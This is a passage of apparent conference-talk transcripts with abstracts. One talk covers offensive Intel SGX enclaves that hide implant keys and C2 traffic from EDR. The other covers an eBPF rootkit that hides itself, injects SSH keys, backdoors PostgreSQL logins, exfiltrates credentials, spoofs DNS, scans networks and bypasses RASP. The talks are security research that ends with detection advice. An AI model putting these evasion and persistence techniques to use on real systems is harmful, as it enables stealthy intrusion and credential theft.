symmetric key between the two. And that's how we achieve secure communication. And then, so components that we want to have in this sort of construction is we kind of thought of splitting it in three ways. The application, which will be inspectable by defense and it's loaded from disk, it's your kind of implant or cradle or loader. We went there out of establishing the bridge between Enclave and that loader, which kind of facilitates in broker's interaction, takes data from one, passes to another, but it's also a kind of middle man that can be taken out of the equation upon first load. So the EDR will not see all of the picture and the bridge can come in as a memory loaded module, which will be able to kind of broker communication between the two, the Enclave and the app at the runtime. And so the bridge is also assumed inspectable. And then Enclave, which is assumed obfuscated, we're going to have some notes on that later on in limitation section. But yeah, so Enclave is where we're going to store our keys and our algorithm. It will be loaded from disk, but it's also a secure library, which may not be introspectable. And yeah, then we need to kind of start building that. And so we come up with that Enclave system, which we're going to demo. And then we'll come back to talk more about its construction limitations and all other things. Let's take a look at the XClave, its components and its operations. Here we have a victim machine with an application, which is an agent or an implant. There's a bridge DLL, which facilitates interaction with the Enclave. It may or may not be on disk. It may or may not come directly from the network and be loaded that way in memory. And obviously, as we mentioned, there is a trusted piece of code that runs in PRM. It makes sense to kind of put the code in perspective in so far as to explain those components. The application finds the bridge. The bridge function is invoked, which is exported and found. The bridge itself maps through the EDL to the Enclave calls. Here's the EDL. Essentially, it's a mapping or a matrix of trusted calls that we can invoke inside of Enclave and untrusted calls that we are not. And Enclave itself is the trusted code that essentially does the processing, does the encryption, and other things that we need to keep secure. And obviously, on the other side, it's a C2 that should be able to match the crypto parameters one to one. So it's able to successfully decrypt and communicate with Exclave that resides inside of the victim machine. And let's take a look at how that works. So essentially, we have two screens. One is the victim machine where all these components are deployed. And there is a C2. Let's start the C2. It listens on the port and it's responding to communication. Let's start the application. And the first thing it does, it's trying to create an Enclave. It's a standard procedure to create the memory mapping and launch things into existence. Once this is done, all checks happen. Are we running on the machine that supports SGX? Are we able to create it? What are the parameters and permissions that allow us or not allow us to do this? And then it's trying to generate a RSA key pair for communication. Once this is done, the public key and private key are available. Private key gets stored in Enclave and public key gets shared through the bridge into the application which connects to the C2 and solicits for a storage of this public key on our side. Once this happens, the C2 carries out the task, does its processing, generates the symmetric key for communication, and sends the response back to the application which proxies it to the bridge into the Enclave which stores it. And this is what we're doing here. So the shared key is now available. And now we are ready to map one-to-one encryption of the payload or would-be payload that would come from C2 into the Enclave again through the app, through the bridge, into the secure area. And this is what's happening here. We're requesting that payload. The payload gets generated. In this case, it's a very contrived example. And it gets encrypted to match the mode of the capabilities of the Enclave. All that processing happens and the payload travels back to the agent and ultimately to the Enclave. And Enclave, having the symmetric key, is now able to decrypt the payload. After this is done, the payload gets stored in clear text in the Enclave, but it's protected from any kind of reachability from the defense. And then the attacker can actually work on that. And last but not least, once we create a Day Enclave, we can destroy it if we don't need it for whatever reason and the duration that we want to use that. Once this is done, everything is good, and we are ready to move on. Okay. So we saw a presentation of how Enclave works. There are some assumptions and limitations to this. First of all, it's a bad coding practice. We are weakening the Enclaves. We're using it. We're misusing them. But our idea is that while the technology can be used as is, a lot of times, EDRs do not inspect Enclaves. In our testing, we were able to use pre-release keys or in pre-release or debug mode, we were able to compile that and then use the white listing, testing signing keys to do that. In theory, that should prevent us from debugging into it, which is true. The EDRs themselves do not actually make the leap on inspecting Enclaves anyway. And so the other side of the story is that in order to do it properly, you need to assign a station key and have Intel provision one and sign it with its root key, and then you can sign your Enclave, which will be undebuggable. But in this case, you're running into attestation, meaning attribution issue. And so we went the other route and said, hey, what can we do with pre-release or debug versions of it? And so not attested Enclaves are supposed to be inspected, but in practice, they're often not. And so as we mentioned before, as JX provisioned, the PSW services installed or platform is installed, and the TC Crypto Library of Cryptographic Primitives is present. So that should let us live off the land once we arrive at SGX-enabled machine. And one thing to notice is that how do you help defenders understand what the Enclaves are and how to find the rogue ones is that you need to watch for signatures, identify non-improved SGX Enclaves. The way you would do this is you basically can have really nice tool from Kedelsky's SGX Fun to dump your DLL and kind of see the details of that Enclave and kind of latch on to the keys that you have not provisioned. So I'd like to thank everybody who has come to my talk. Here's the link to a proof of concept, the Bridge Library, the Enclave and Application, which we've used in this presentation. Thank you very much.
|
As developers start to rely more on hardware-based memory encryption controls that isolate specific application code and data in memory - secure enclaves, adversaries can use enclaves to successfully coexist on the host and enjoy similar protections. In this talk we venture into a practical implementation of such an offensive enclave, with the help of Intel SGX enclave technology, supported on a wide variety of processors present in enterprise data-centers and in the cloud. We discuss how malware can avoid detection in defensively instrumented environments and protect their operational components from processes running at high privilege levels, including the Operating System. We dive deeper into using enclaves in implants and stagers, and discuss the design and implementation of an enclave that is capable of facilitating secure communication and storage of sensitive data in offensive operations. We cover how the enclaves can be built to help secure external communication while resisting system and network inspection efforts and to achieve deployment with minimal dependencies where possible. Finally, we release the enclave code and a library of offensive enclave primitives as a useful reference for teams that leverage Intel SGX technology or have the hardware platform capable to support such adversarial efforts.
|
10.5446/54207 (DOI)
|
Hi, and welcome to our talk. My name is Guillaume Fournier. I'm a security engineer at Datalog, and today, C.LiveChan and I are going to present the rootkits that we implemented using eBPF. If you don't know what eBPF is, don't worry, we are going to present this technology and tell you everything you need to know in order to understand the talk. So let's start with a few words about us. We are the cloud workload security team. We usually use eBPF for good, and our goal is to detect threats at front time. Everything we do is added to the data.org agent, which is an open source project, so feel free to check it out if you are interested. That being said, for DevCon, we decided to use everything we knew about eBPF to build the ultimate rootkits. So as I said before, we are going to start the talk with a brief introduction to eBPF. Then Sylvain will take it over to talk about how we implemented obfuscation and persistent access in our rootkits. After that, I will come back to present the command and control feature along with some data exfiltration examples. And then I will talk about the network discovery and RAS bypass features of the rootkits. And finally, Sylvain will present a few detection and mitigation strategies that you can follow to detect rootkits, such as ours. All right, so let's start with eBPF. eBPF stands for Extended Berkeley Packet Filter. It is a set of technologies that can run sandboxed programs in the Linux kernel without changing the kernel source code or having to load kernel modules. It was initially designed for network packet processing, but many new use cases were progressively added. So for example, you can now use eBPF to do kernel performance tracing along with network security and, you know, runtime security in general. So how does it work? So eBPF is simply a two-step process. First, you have to load your eBPF programs in the Linux kernel, and then you need to tell the kernel how to trigger your programs. So let's have a look at the first step. eBPF programs are reach in C. So it's not exactly C. It's more like a subset of C because of many restrictions that eBPF has to follow. But I'm going to talk about this later. So once you have your C program, you can use LLVM to generate eBPF bytecode, which you can then load into the kernel using the bpfc school. eBPF programs are really made of two different things, eBPF maps and the actual program. So there are a lot of different types of eBPF maps, but all you need to know is that they are the only way to persist data generated by your eBPF programs. Similarly, there are a lot of different program types, and each program type has its own use case. However, regardless of the program type, each program has to go through the same following two phases. So the first one is the verifier step. So I will talk about this later, but for now, just know that this ensures that your program is valid. And second, you have the, I mean, second, your eBPF bytecode will be converted into machine code by a just-in-time compiler. And when those two phases succeed, your program is ready to be executed. Step two is attaching eBPF programs. So in other words, this is when you tell the kernel how to trigger your program. So there are many different program types, and I can't present them all, but I'm just going to talk about four of them. So for example, you have, you can use a k-probe to trigger an eBPF program whenever a specific symbol in the kernel is called. Trace points are similar to k-probes, but the hook points on which they can be attached have to be declared manually by the kernel developers. Those two programs require another syscall in order to be attached, and this syscall is the perf event open syscall. So the other two program types I wanted to talk about are TC classifiers, so it's SCAD-CLS, and XDP programs. So those program types can be used to do packet processing, so whenever some network traffic is detected at the host level or at a specific network interface level. Those two require a net-click command to be attached. And the only thing to remember here is that each program type has its own setup, and thus, Mac require a different level of access. Another very important fact about eBPF is that eBPF maps can be shared between different programs regardless of their program types. All right, so the eBPF verifier. So the verifier is used to ensure that eBPF programs will finish and won't crash. To do so, it's really just a list of rules that the verifier checks, and your program has to comply with those rules. So for example, your program has to finish. It cannot be an infinite loop. So your program has to be a directed acyclic graph. You can have unreachable code, you can have unchecked differences, your stack size is limited, and your overall program size is also limited. And finally, one of the most infamous features of the verifier is its very cryptic outputs. So basically, if your program doesn't pass the verifier step, you will have a huge log of everything that the verifier looked into, and eventually some kind of error telling you what happens. But yeah, basically you are in for a very painful debugging session. Last but not least, eBPF comes with a list of helpers that will help you access data or execute operations that you wouldn't be able to write natively. So for example, you have context helpers, you have map helpers, a lot of things that you wouldn't be able to write in C and that you would need external instrumentation to do. In short, you have about 160 helpers, and most of the heavy lifting of your eBPF programs will be based on those helpers. So that concludes this introduction to eBPF, and I will hand it over to you Silvan, so that you can kick off the presentation of the breakkits. Thank you Guillaume. Before we get into the details, let's see why eBPF is an interesting technology to write a rootkit. First, the safety guarantee brought by eBPF means that a bug in our rootkit cannot crash the host. An error in the execution will not cause any log message to be emitted. The user's effort has no way to know that something actually went wrong and no sees notice the presence of the rootkit. As we saw earlier, the eBPF by code is converted to native code, and the number of instructions is limited, which limits by extension the performance impact that our rootkit can have on the machine that could otherwise be detected by the user. On the commercial side, eBPF is used by an increasing number of vendors, in various use cases, network monitoring security, for instance. With eBPF becoming widespread, the sense of one product being abused to load malicious programs also increases. The safety guarantee we just talked about should not give the security administrators the false feeling of security. There is a lot of activity around eBPF, and each new version of the Linux kernel comes with a new set of eBPF helpers, bringing new capabilities. As we wanted our rootkit to run on a widely used distribution Linux such as Red Hat Enterprise Linux, or the latest Ubuntu LTS, we used a limited number of helpers. Using recent helpers or features like KLSI would have probably made the development of the rootkit easier. One of the primary tasks of a rootkit is to hide itself. What does it mean in our case? eBPF programs are bound to a running process. If this process gets killed, all the attached eBPF programs will be unloaded. For that reason, it is essential that we both hide our program and protect it from being killed. The eBPF programs and maps used by the rootkit should also be hidden, and we should forbid other programs to gain access to them through their file descriptors. Let's see our rootkit in action. Let's start the rootkit. It gives us its PRG. Then we can try a ps command in order to see if we can detect it from the output. We can try using its procfs entry and nothing. We can even try using a sub file or even a relative pass. We still have the same issue, no such file directory. Finally, we can try to send a signal to see what happened, and we get no such process error. The obfuscation capabilities of our rootkit mainly rely on the use of two eBPF helpers. The eBPF program right user helper allows our eBPF program to write into memory of the process that issues a syscall. This can be used, for instance, to alter the data that is returned by a syscall. It's also possible to alter the syscall arguments. There is one caveat with this eC helper. The memory to be modified has to be mapped into the kernel aliaspace. Otherwise, a minor or major page fault will be triggered, causing the bpf property user call to fail. The other bpf helper is to use the bpf override return. This one allows you to change the return value of a syscall and has an interesting property. If this helper is used at this syscall exit, it will simply change the return value of the executed syscall. But if we use it at the entry of the syscall, the execution of the syscall will be completely skipped. It is important to note that this helper can only be used at the entry of the syscall or at the exit. So let's see how the obfuscation of a file actually works. At startup, the rootkit will populate a map with the pass of its pre-proc.pid folder. Now, the user space issues a fragmented syscall, such as state. This syscall usually comes in two forms. One that accepts the pass to the file as a string. Another one that accepts the file descriptor for the file that the user space program must have previously resrived using an open syscall. So let's consider the former. To properly identify the targeted file, the rootkit needs to do an accurate resolution of the pass, as the pass-specific file could be a relative pass. At the entry of the syscall, there is no in-us context to do the resolution. So we need to go deeper in the kernel in our case in dbfs code. So we have the resolution, but at this point, we cannot block the syscall, as we are outside of the allowed hookpoints for the ebpf override return helper. So the only thing that we can do is to change the return value so that the user space believes that the syscall failed. We also need to scrub the content of the switcher that could have been filled by the kernel. Now let's consider the later, the version that accepts the file descriptor. We do the same pass resolution as before, but instead of just pretending to the user space that the syscall failed, we store the file descriptor that the kernel allocated into an ebpf map. If the same process issues the syscall with the same file descriptor, we can, at the syscall entry, return an error, and block the syscall. In this situation, the user has no way to know that the file descriptor exists, and as we control the read the syscall, we can also hide all the references to the file descriptor in procfs. Blocking the syscall that accepts the PID as an argument is trivial using bpf override return, same for loading kernel modules. Now let's see a demo, let's demo the obfuscation of our bpf programs and maps. So we still have the rootkit started, and if we list the maps and the programs thanks to the bpf tool command line, we can't see anything related to the rootkit. Now if we start a binary loading some kprobs and maps, and we list again the programs, we can't see the programs related to the binary, but still nothing related to the rootkit. Then we can even try checking the kprobs and still nothing related to the rootkit. The idea is to hook into the ebpf syscall itself. Two things are required here. We want to avoid the user space to iterate through the IDs of our entities using the bpf.proget.next.id command, and we need to prevent the user space from getting a file descriptor to the program or map from a DID using bpf.proget.fd by ID, basically to prevent ID gassing. Once these operations are endowed by the rootkit, the user space is not able to view or modify our programs and maps. bpf.progrite.user is a crucial part of our rootkit, but it comes with a pitfall. When an ebpf program that makes use of it is loaded, the kernel prints a pretty scary but legitimate message in the kernel ring buffer. So let's see how the rootkit handles this. First, let's check what is the current status of the kernel ring buffer using the command line dmissage. So nothing special here. And we can even start a cat on the device used by the ring buffer. Then we start the rootkit. So we can see that the cat terminated with a pretty legit looking message. We can recheck the kernel ring buffer thanks to the dmissage command line, and we can only see legit looking messages. But a bit more. And then we can stop the rootkit and we can run again the dmissage command line in order to see what was overwritten by the rootkit. So let's see how it works. In this diagram, John Alde is waiting for a new message and is blocked on a readcscall. Two bpf programs are loaded secondarily by the rootkit. The first one, which doesn't use the bpfprogrite user, will hook on a readcscall and will make it return 0 and will write a legit looking message. This will guarantee that the warning message is related to the bpfprogrite user won't be read. Then the second program using bpfprogriteuser is loaded. At this point, the readcscall can be unblocked and we can override the content of the warning messages with legit looking messages. Another important task for the rootkit is to set up a persistent access across reboots, for instance. The rootkit can copy itself to a dedicated place and hide its binary file with the same mechanism that we already saw. For the persistent access to the system, we can use a generic method close to what we described in the obfuscation part. We can replace the content of some critical files read by the root demands such as cronzy or even sshd. Let's see an example targeting sshd and using the read overwrite approach. So the approach here is to append an ssh key to the authorize key files. Only sshd should be impacted, meaning the file will remain the same for the user point of view. And we want to have it available through the command and controls. So let's see this in action. So let's check the authorize keys content first. So we can see that only one key is present. So let's start the connection. And it seems that a password is required. So now we are going to start the rootkit. And we are going to specify that we want to inject an ssh key to the authorize keys file but only for ssh. So we can try a connection again. And it seems to be successful. And now we can check what is the content of the authorize key from the user point of view and nothing changed apparently. Persistent access to an application database can also be set up using an other type of evpf program. Uprobs evpf programs attached to user space function. In addition to being safer and easier to use than ptrace, they offer a valuable advantage. The kernel will automatically set up for us the hooks on every instance of the program. Let's see a uprob demonstration using proso-grace-sql. So first let's try to connect to proso-grace-sql using the word bonsoir as password. This one seems to be the good one. Then trying hello. And this one is redacted. Now we start the rootkit. And we'll get the opposite result. Now the valid password is hello. So the idea here is to hook on the md5 crypt verify function of evpf-grace-sql that checks whether the user provided the right md5 for its four passwords and the challenge sent by the server. Overwriting the expected hash contained in shadowpass with a known value makes the comparison succeed and gives persistent access to the database to the attacker. Now I will hand over to Guillaume that will show you the command and control capabilities of the rootkit. Thank you Sylla. Let's talk about the command and control feature of the rootkit. So what exactly do we want to do? We want to be able to send commands to the rootkit to extract data and to get remote access to the infected hosts. Unfortunately there are a few evpf-related challenges that we need to face in order to implement those features. First you can't initiate a connection with evpf. Second you can't open a port. However evpf can hijack an existing connection. So in order to show up this feature we have set up a very simple infrastructure on AWS. A web app was installed on an ec2 instance and we used a classic load balancer to redirect HTTPS traffic to our instance over HTTP. In other words the tier estimation is done at the load balancer level and HTTPS requests are sent to our instance unencrypted. So our goal is to implement cnc by hijacking the network traffic to our web app. First we need to figure out which evpf-program types we're going to use in order to implement this feature. Although evpf provides a lot of options to choose from we decided to go with two evpf-program types xdp-programs and tc-classifier-programs. So both those programs are usually used to do deep back-end inspection use cases and while xdp only works for ingress, tc works on both ingress and egress traffic. Another difference between the two program types is that xdp-programs can be offloaded to the network interface controller which essentially means that your program will be run before the packet enters any subsystem into the network stack. On the other hand tc-programs have to be attached to a network interface but like much later in the network stack which means that they are triggered later in the kernel. With both programs you can drop, allow and modify your packets and with an xdp-program you can also retransmit a packet. This option is actually super interesting for us because it means that you can essentially receive an answer to a packet even before it reaches the network stack which in other words means that you can do this even before it reaches any kind of network firewall or monitoring on the host. Skipping the network stack also explains why xdp-programs are mainly used for DDoS mitigation and tc-programs are usually used to monitor and secure network access at the pod or container level. So what you need to remember about this slide is that first xdp-programs can be used to hide network traffic from the kernel entirely and tc-programs can be used to excretory data on its way out. Okay first let's see how we used xdp-programs to receive commands with the rootkit. So we implemented a client for the rootkit and this client communicates with the rootkit by sending simple https requests and with a custom route in custom user agent. So after going through the load balancer the request eventually reaches the host and triggers our xdp-programs. Then our program parsed the request, the http-route and understand that this request is not meant for the web app but is meant for us. So after reading the user agent the rootkit executes the request that can end and moves on to the final step. So this final step is probably the most important one. It overrides the entire request with a simple health check request and we do this for two different reasons. First we don't want the malicious request to reach the web app or any kind of user space monitoring tool that might be grinding and that might detect the unusual traffic. And second we want the client to receive an answer in order to know if the request was successful. So as I said before we could also have dropped the the packet entirely but since we're using TCP the load balancer would have retransmitted the packet over and over again until the request times out and this would have generated noise and increase our chances of getting discovered. That said if you have I mean if you were working with a UDP server this would be a totally valid strategy. So let's have a look at how we can send progress credentials remotely. All right so on the left of the screen you can see two different shells. Those shells are connected to the remote infected host on the AWS and on the right this is my local shell and this is the attacker machine. Okay so let's start with trying to log into the progress database using the normal password and again the rootkit is not running yet. So as you can see the Bonsoir password works fine and then let's start the rootkit and restart to log in again and as expected and as you've seen before during a Sylvain's demo it doesn't work. So you have to change into hello and this time it will work. Here you go. Okay so we're going to try to do the same thing but instead of hard coding the new password with the rootkit we're going to define remotely through cnc what the new password should be. So as you can see we have a custom client that will make a request to HTTPS, an HTTPS request to defconn.demoted.doc and then we will provide both the rule and the secret to override the normal secret with. So the request that we'll go through is a very simple one with a custom route and the user agent will contain the new password that will be used at runtime. So as expected we get the 200 okay from the health check which essentially means that we know that the new password now is defconn and not hello anymore. So as you can see hello doesn't work but if I'm changing it to defconn here we go this time it draws work. Okay so this is how we send the command to the rootkits. Now let's see how we can exfiltrate data. So to exfiltrate data the client has to send an initial request to specify what kind of data and what kind of resource we want to exfiltrate. So the xdp part of this process is basically the same as before but this time the xdp program stores the network flow that made the request along with the request resource the requested resource sorry in an ebpf map and the reason why we do so is because when the web app answers the health check we want to be able to detect the packets that are meant to be sent back to the client. So when the HTTP answers answer reaches the tcegress classifier our ebpf program looks up the network flow and overrides the answer with the requested data. Now the question is what kind of data can you exfiltrate with the rootkit right and the answer is well pretty much anything that is accessible to ebpf and the reason for that is as I said before multiple program types can share data through ebpf maps regardless of you know what those programs are supposed to do. So basically you can exfiltrate things like file content environment variables, database dumps, in-marry data if you start looking at the stacks of the programs. Anyway you can pretty much exfiltrate whatever you want. So let's have a look at a simple demo that is we can exfiltrate postgres credentials along with the file content of etcpassword. All right so and again the two shells on the left are the ones connected to the infected host in on the ws and on the right this is my local shell. So the first request that I make here is to list the I mean to do is progress list which basically means place list all the credentials that you have detected so far since the rootkit has started. And as you can see the answer was so the hashtag answer was overridden with the content of a map that we used to store the passwords that we've collected at runtime. And again remember that with postgres you don't need the clear password to login you just need the hash password that is stored in the database. Here you go so now we're going to try to do the same thing to dump the content of etcpassword. So to do so this is a two-step process. The first thing you want to do is tell the rootkit to start looking for this specific file and as soon as a user space process tries to open the file and read the content of the file our rootkit will actually copy the data as it is sent to the user space application and save it into the nubbf map so that it can be retrieved later. So this first request will tell the the the rootkit to start looking for etcpassword. And now let's go back to the host and you know do trigger some kind of pseudo operation so that we can actually I mean so that a user space process tries to open the file. Here you go. And then this time instead of saying add we're going to say get and this will dump the content of the etcpassword. Here you go. All right so the cool thing about this technique is that it applies to any unencrypted network protocols so for example we also implemented it for dns which means that you can actually use it to do dns poofing so the only difference between the normal way of doing this and the dns poofing is that instead of using a tc program to override the answer of the request you will actually switch to see an xdp programs because dns requests are made from the host instead of received by the host. All right so let's move on to our network discovery feature. So I know everybody knows what it is but I have to say it anyway network discovery is the ability to discover machines and services on the network so that you know where you want to go next in the infrastructure and also discovering services is a super important step when you are trying to pivot between hosts because it will tell you what kind of attacks you might want to try. So the wordkit has two different network discovery features. One of them is passive the other one is active and you can control both of them through command and control. So I'm going to get into more details later but basically the only difference between the two is the kind of network scanning you're looking for and also the level of traffic that you are willing to generate on the network. So first let's have a look at the passive option. So the passive option is simply a basic network monitoring tool so it will do pretty much the same thing as any other ebpf based network monitoring tool which means that it will listen for any ingress or egress traffic and then generate a graph from all the collected network flows. It will also show you the amount of data that was sent per network flow and to implement this feature we used our TC and XDP programs. So the TC programs were used to monitor the egress traffic and the XDP programs were used to monitor the ingress traffic. So for this version of the wordkit we are limited to IPv4 and TCP UDP packets that said support for IPv6 and all the other protocols could have been added easily. So the reason why the passive option is pretty cool is that it will not generate any traffic on the network. In other words it is basically impossible to detect that someone is tapping into your network and more specifically the network that is you know that reaches this specific infected host. However this doesn't work for services that do not communicate with the infected host and so in other words the graph will definitely not be complete and that's also why we implemented the active method. So the active method is a simple ARP scanner along with a SIN scanner. So we implemented it using only our XDP programs which means that only I mean that the entire process is done without involving the kernel stack and although this will be a slower process you can use this method to discover hosts and services that are reachable by the infected host but that are not communicating usually with the infected host. And again the rootkit client will generate a nice network graph for you once the scan is complete. So on a technical level this feature of the rootkit is actually quite interesting because as I said before eBPF cannot create a connection from scratch. So in other words we had to figure out a way to generate hundreds of SIN requests while dealing with this limitation of eBPF. So let's see how we solved this problem. So in order to send a SIN request you first need to know the MAC address of the IP that you want to scan. To do so we used the same trick that we've been using so far which is to override the request from the rootkit client. So when our XDP program receives a scan request for a specific IP and a specific port range it will override the entire request with an ARP request for the target IP. And then instead of returning XDP pass which is what we've done so far and also which would send the packets to the network stack our eBPF program returns XDP TX. So what XDP TX does is send the packet out to the network interface controller it came in from. In other words our HTTP packet was transformed into an ARP request and was sent back to and broadcasted back to the entire local network. So eventually the target IP will answer the ARP request and we will be able to store the MAC address of this specific IP in an eBPF map. However during this entire process the TCP packet that was used to send the HTTP request was never acknowledged by the kernel and that is simply because it never made its way to the kernel in the first place which means that the load balancer or the client itself will eventually try to retransmit the packet and when this packet is retransmitted and when it eventually reaches our XDP program we will do the exact same thing but this time instead of because we know the MAC address instead of overriding the request with an ARP request we're going to override the request with a SYN request and more specifically a SYN request with the first port of the provided port range the target IP and and the MAC address of the target IP and assuming that the remote IP or the remote host doesn't have any kind of protection against SYN requests and sorry SYN scanning it will answer either resets or SYN plus AC to this first request so a reset would mean that the port is open and SYN plus AC would mean would indicate that there might be a service running running on the host and this is where the basically the network loop happens and the reason why we were able to generate hundreds of packets without having to I mean while dealing with the limitation of eBPF that is the inability to create packets so whenever we get an answer from a SYN request we override the received packet with another SYN request on the next port and we also switch the IPs switch the MAC addresses and send it back again to the target IP and we do so in a loop until the we go through the entire port range so eventually the clients will try one last time to retransmit the the initial HTTP requests because once again during the network loop we never answered the second retransmit so eventually when this third retransmit reaches our XDP program we will override the request with the usual health check requests so that the 200 okay answer will make its way back to the client after the request was handled by the whatapp in user space all right so let's see it in action so on the right of the screen this is a shell to the infected host on the dws and at the bottom here it's another one and at the top this is my local shell on my machine so the first thing you want to do is to start the rootkit then second is to start dumping the logs of the rootkit so in eBPF you can actually generate logs using a trace pipe obviously you would not want to do this in a real use case for a rootkit but this is a great way of visualizing the the scan as it goes through um yeah so that's why i'm doing this and that's why we'll see what the rootkit does at runtime and then let's make the scan requests so what i'm saying here is please scan the ip 10.0 the 2.3 from port 790 and for the next 20 ports after this one so the first thing you can see is is the request is immediately changed into an arp request and we already got the answer for this arp request so next up when we get a retransmit we will change this into a scene request there you go so the scene request went through and then you can see the loop that happened and we you know like increased port one by one until we reached the final port requested by the the port branch and then now we are waiting for the third retransmit and this retransmit will be the one that we override with the health check requests which means that we will eventually get here go the 200k and in other words you know the answer from the user space web app all right so now what you want to do is retrieve the output of the scan and x-ray the all the network flows that were detected at runtime and here goes so you would say network discovery get and eventually um so it actually requires a lot of different requests because there is a lot of data to x-ray but eventually you will get the entire list of network flows that were captured by by the work kit here you go so you have the all the different individual flows and then more importantly you will have a graph generated for you so this one is the passive sorry active graph so as you can see in a range there you can see the arp request and replies from I mean between those different hosts and then in gray those are the scene requests and the reset answers and in red is the only scene plus ac answer from the remote host all right and then you have also the passive graph which is the one that we saw before okay so now let's move on to our rasp bypass so rasp stands for runtime application self protection self protection um so in a few words a rasp is a new generation of security tools that uses um runtime instrumentation to detect and block application level attacks and more importantly it leverages its insight into the application in order to make more intelligent decisions so simply put it is some kind of advanced input monitoring tool um that can detect malicious parameters and can understand if a malicious input will successfully exploit a weakness um from one of your apps so the textbook example of a rasp is usually a SQL injection so the rasp would implement multiple functions uh instruments sorry multiple functions in the libraries that you use and such as for example the htp server library or the sql library and it will check at runtime that the user controlled parameters in your queries are properly sanitized um if not the rasp will stop the query before it reaches the database and redirect the client to an error page or some kind of error message in other words a rasp and relies on the assumption that the the application runtime has not been compromised which is exactly what we can do with the bpf so just a little disclaimer before I move forward I want to stress the fact that we are playing outside of the boundaries of what a rasp can protect you from and more importantly this bypass does not apply to one specific rasp but to all of them because this is one of the core principles of how a rasp works so let's have a look at how a rasp products um a go web app from a sql injection so let's say that you have a web app with a simple products page and a get parameter um to specify the the the category of the products that you want to see chances are your web app uses the default go database sql interface um so this is a generic interface that you can use to query your database without having to worry about the underlying driver and the database type that you're using more importantly for us since it is such a generic interface this is usually where the the rasp tools um instrument your code um because simply it's much easier to hook at this layer rather than having to hook onto all the underlying drivers so when your request is handled by the web server the query will be formatted with with the provided category parameter and eventually the web app will call the query context function of this sql interface um this is when the rasp checks the the the query and makes sure that everything is normal and if it is the execution will resume its normal flow and the underlying query um driver will be called so in our example we use sqlite so the sqlite driver is called eventually the query makes its way to the database and the answer is sent back to the client however if the rasp detects um that's you know something is wrong or detects some kind of sql injection it will block the query and redirect the client to an error page all right so now let's see what we did to bypass this protection well the answer is actually pretty simple we added a u probe on both the database sql interface and the sqlite driver interface um what this allows us to do is call one of our bpf programs right before the rasp checks the sql query and trigger another one right before the um the the sql query is executed by the database itself and thanks to the bpf prog write user helper um we can override the input parameters of the hooked functions so that the the rasp sees a benign query um and the the the database executes our sql injection and the cool thing about this is that we can even do it conditionally um which means that we can um you know bypass the the rasp only if one specific secret password was added to the beginning of the query perfect so let's move on to the demo so as you can see we have a very simple web app um so it's a shoe shoe's retailer um so you have a lot of different products and um you can filter by category so let's try to do a simple injection um using the get parameter so the the injection will simply be a union select star from user and because the rasp is not running right now um the sql injection should work here you go and if you scroll down this time you will see the users and along with the the passwords perfect so now let's restart the web app with the rasp which is what i've just done and try this again so let's go to the shop and then override the um category parameter perfect and this time the rasp blocked the request because um it detected that um you know someone tried to do a sql injection and the sql injection would actually have succeeded great so now let's start the rootkits by providing the path to the web app and then try to refresh the page so again this should also be blocked by the rootkits by the the rasp because we haven't provided the the secret password for the bypass to work and the secret password is of course defcon and when we say defcon the entire process that i described before will be triggered and as you can see the rasp did not detected so that's all for our rasp bypass i hope you had fun um just before i hand it over to sylvan for the detection and mitigation strategies i wanted to say that unfortunately we won't have time to talk about the container breakouts that are implemented into the rootkits however they have been presented during our black hat talk this year so if you are interested feel free to check it out that being said sylvan take it away so let's talk about detection and mitigation how could we detect and protect ourselves from this type of rootkit we could do this at different levels first if a vendor provided you ebpf programs you should go through another audit an audit and an assessment phase of their programs some changes are bad the code has to be gpl it probably uses some internal kernel symbols so you can ask for it what should we be looking for the program types that are used but also the ebpfl pros used the communication so maps between programs may indicate a punctual risk in the case of that the vendor program is compromised we developed a tool to assist in this auditing phase by inspecting the health files containing the ebpf programs it is able to list the used entities programs and maps and complete a graph of the interactions between them the tool was run on our rootkit with the following result we can identify on the graph that the xdp program has storing information into maps that are also used by some kprobs which correspond to the common uncontrolled capabilities of the rootkits it is also possible to mitigate at runtime the loading of such programs by monitoring calls to the bpfc's call and logging the usage of it it will even it will even be possible to protect the bpfc's call itself by either restricting the call to it to only some trusted processes have the programs inspected before loading and rejected if they contain suspicious patterns or make use of some dangerous helpers we could also compute and validate the signature of the programs before loading them an initiative exists to add this verification logic to the channel itself using tls everywhere for natural traffic also helps mitigating the risk of a rogue ebpf program that intersects natural data now if we were not able to block the loading of such a rootkit how difficult would it be to detect its presence even if it's possible though very challenging to write an almost perfect ebpf rootkit we should concentrate on the action that the rootkit would have to block and lie about the result of such actions for instance our rootkit disables the loading of the kernel modules because such a module would have the ability to list the ebpf programs and the active kprobs now let's imagine that we insert a module that executes a specific action only known to us the blocking of the module by the rootkit would then be easy to detect monitoring the natural traffic traffic adding infrastructure levels could help detecting hijacked connection or strange package transmission our rootkit being far from complete and far from perfect it should be relatively easy to detect it that being said we hope it will bring to light the potential and the risk of such an ebpf based rootkit while presenting some interesting technique the code of both the rootkit and the monitor is available at this addresses please have a look thanks for your attention and have a great conference
|
Since its first appearance in Kernel 3.18, eBPF (Extended Berkley Packet Filter) has progressively become a key technology for observability in the Linux kernel. Initially dedicated to network monitoring, eBPF can now be used to monitor and trace any kind of kernel space activity. Over the past few years, many vendors have started using eBPF to speed up their services or introduce innovative features. Cilium, Calico, Cloudflare, Netflix and Facebook are leading the charge, showing off new complex networking use cases on a monthly basis. On the security side of things, Google recently contributed the Kernel Runtime Security Instrumentation which opens the door to writing Linux Security Modules with eBPF. In other words, eBPF is the new kid in town and a growing number of companies are running services with eBPF access in production. This leads us to a simple question: how bad can things get if one of those services were to be compromised ? This talk will cover how we leveraged eBPF to implement a full blown rootkit with all the features you would expect: various obfuscation techniques, command and control with remote and persistent access, data theft and exfiltration techniques, Runtime Application Self-Protection evasion techniques, and finally two original container breakout techniques. Simply put, our goal is to demonstrate that rogue kernel modules might have finally found a worthy opponent. We will also detail how to detect such attacks and protect your infrastructure from them, while safely enjoying the exciting capabilities that eBPF has to offer. REFERENCES: Bibliography and documentation links cited in the submission: 1. Russian GRU 85th GTsSS deploys previously undisclosed drovorub malware, NSA / FBI, August 2020 https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF 2. Kprobe-based Event Tracing, https://www.kernel.org/doc/html/latest/trace/kprobetrace.html 3. Linux Kernel tracepoints, https://www.kernel.org/doc/html/latest/trace/tracepoints.html 4. “bpf_probe_write_user” bpf helper, https://elixir.bootlin.com/linux/v5.11.11/source/include/uapi/linux/bpf.h#L1472 5. Uprobe-based Event Tracing, 